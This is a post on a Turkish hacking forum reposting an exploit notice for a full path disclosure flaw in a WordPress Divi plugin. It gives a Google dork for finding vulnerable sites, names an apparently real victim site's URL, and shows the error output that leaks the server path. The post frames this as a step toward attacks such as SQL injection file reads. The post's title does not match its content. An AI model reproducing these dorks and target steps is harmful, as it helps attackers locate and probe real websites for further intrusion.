3d weapon creator vulnerable to exploits wordpress

orsinos

orsinos

Yeni üye
10 Ocak 2014
10
0
wordpress exploit

title: Wordpress divi 100 articlecard FDP by KelvinSecTeam
Date: 26/10/2017
Category : Webapps
URL Vendor : https://www.elegantthemes.com/blog/...n-gives-the-divi-blog-module-a-brand-new-look
Google Dork : inurl:wp-content/plugins/divi-100-article-card
author: KelvinSecurity


FDP owasp: Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.

EXAMPLE:

URL_: http://tusambil.com/barquisimeto/wp-content/plugins/divi-100-article-card/
FDP: http://tusambil.com/barquisimeto/wp-content/plugins/divi-100-article-card/article-card.php



Fatal error: Call to undefined function add_filter() in C:\inetpub\wwwroot\WebApps\Sambil\Barquisimeto\wp-content\plugins\divi-100-article-card\article-card.php on line 27
 
Son düzenleme:
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.